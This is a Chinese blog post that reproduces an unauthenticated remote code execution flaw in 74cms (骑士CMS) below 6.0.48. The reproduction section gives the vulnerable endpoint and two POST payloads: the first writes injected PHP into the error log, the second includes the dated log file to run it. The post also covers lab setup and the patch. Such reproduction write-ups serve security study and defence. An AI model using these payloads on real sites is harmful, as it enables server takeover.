美文网首页
骑士CMSgetshell复现

骑士CMSgetshell复现

作者: 5f4120c4213b | 来源:发表于2020-12-22 17:45 被阅读0次

0x00简介

骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。

image

0x01漏洞概述

骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,甚至会照成控制服务器等严重漏洞。

0x02影响版本

骑士 CMS < 6.0.48

0x03环境搭建

环境:windows2008R2+phpstudy

1.cms下载,在骑士cms官网下载6.0.20版本

下载链接:http://www.74cms.com/download/index.html

image

2.下载完成后解压放入WWW目录下安装

image

3.根据自己的配置,安装骑士cms

image image

0x04漏洞复现

1.访问网站首页,在url处输入一下链接漏洞页面

index.php?m=home&a=assign_resume_tpl

2.使用post发送一下请求

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

image

3.在骑士cms安装目录data\Runtime\Logs\Home查看日志发现已经记录了错误信息

image

4.使用post发送以下请求包含日志,日志名称就是当天的年月日,直接包含即可

variable=1&tpl=data/Runtime/Logs/Home/当天年月日.log

image

0x05修复建议

1. 在骑士cms官网下载最新的补丁包

下载地址:http://www.74cms.com/download/index.html

相关文章

  • 骑士CMSgetshell复现

    0x00简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件...

  • NetLogon 域内提权漏洞(CVE-2020-1472)

    NetLogon 域内提权漏洞(CVE-2020-1472)复现 摘要 影响版本 复现环境 漏洞脚本 复现开始 首...

  • ThinkPHP——ThinkPHP 5.x远程代码执行

    0x00目录 漏洞简介 影响版本 复现前提 复现环境 复现过程 总结 参考链接 0x01漏洞简介 ThinkPHP...

  • 复现

    我感谢生命中所有美好 但是,经历过幼时的格格不入 尝试过很多种调解无效 高中时期失败的班干体验 和糟糕的班级氛围 ...

  • 复现

    年底的事件反复出现 魔咒般到时间就到来 是什么创造反复事件 请你走开魔咒般事件 请你离开我的生活间 我们不欢迎你的出现

  • Android 8.0频现GC crash

    问题现象 复现步骤手机(Android 8.0, build id为opr6.170623.013)复现场景一: ...

  • 记 libAccessibility 通知 Crash 排查

    Crash 信息 libAccessibility 在发送通知时产生了 Crash。 复现场景 在某些路径可以复现...

  • 我是骑士

    骑士的马,骑士的剑,骑士的荣耀精神

  • 我可是一个有着音乐梦的骑士(假面骑士响鬼)

    假面骑士响鬼,又称假面骑士Hibiki,他是平成假面骑士历史中的第6位骑士,于2005年正式开播。 与其他骑士不同...

  • [javascript]关于firstChild和lastChi

    复现:## debug:## so:问题主要是出自 之后和 之前的“回车”和“空格”字符,复现里面打印出的#tex...

网友评论

      本文标题:骑士CMSgetshell复现

      本文链接:https://www.haomeiwen.com/subject/mulsnktx.html